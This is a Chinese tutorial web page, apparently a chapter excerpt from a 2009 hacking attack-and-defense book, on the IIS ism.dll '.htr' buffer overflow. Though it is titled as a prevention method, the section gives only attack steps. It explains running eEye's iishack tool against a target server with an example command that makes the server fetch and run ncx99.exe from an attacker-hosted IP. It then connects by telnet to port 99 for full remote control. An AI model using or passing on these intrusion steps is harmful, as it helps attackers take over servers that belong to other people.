当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-防止入侵的方法(9)

安全基础
入侵常用TCP端口作用及其操作建议之十二
入侵常用TCP端口作用及其操作建议之十三
入侵常用TCP端口作用及其操作建议之十四
入侵常用TCP端口作用及其操作建议之十五
Win 2000操作系统二十条超级应用技巧(1)
Win 2000操作系统二十条超级应用技巧(2)
NTFS格式大硬盘数据恢复特殊案例分析
入侵常用TCP端口作用及其操作建议之十六
入侵常用TCP端口作用及其操作建议之十七
入侵常用TCP端口作用及其操作建议之十八
入侵常用TCP端口作用及其操作建议之十九
入侵常用TCP端口作用及其操作建议之二十
入侵常用TCP端口作用及其操作建议之二十一
入侵常用TCP端口作用及其操作建议之二十二
入侵常用TCP端口作用及其操作建议之二十三
入侵常用TCP端口作用及其操作建议之二十四
入侵常用TCP端口作用及其操作建议之二十五
入侵常用TCP端口作用及其操作建议之二十六
入侵常用TCP端口作用及其操作建议之二十七
入侵常用TCP端口作用及其操作建议之二十八

安全基础 中的 黑客攻防技术内幕-防止入侵的方法(9)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 110 ::
收藏到网摘: n/a

6.6 htr溢出入侵

    

6.6  htr溢出入侵

IISInetsrv目录下,有个DLL文件叫ism.dll,这个模块在Web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm利用这个漏洞,eEye写了两个程序:iishack.exencx99.exe

在命令提示符下运行iishack程序,如图6-60所示。

6-60  iishack运行界面

命令行运行格式:

iishack 目标主机 端口URL(ncx99链接路径)

入侵者必须自己有一个空间,把ncx99.exe上传到该空间下,比如入侵者将ncx99.exe上传的路径是:61.129.81.122/ls-net/ncx99.exe,而对方的IIS serversh.kill.com.cn,则输入如下内容:

iishack sh.kill.com.cn 80 61.129.81.122/ls-net/ncx99.exe

如图6-61所示。

注意:

在输入ncx99.exe路径时不带http://

6-61  htr溢出

接着在提示符下输入:telnet sh.kill.com.cn 99即可通过99号端口登录到对方服务器。这样,入侵者就可以完全控制目标计算机。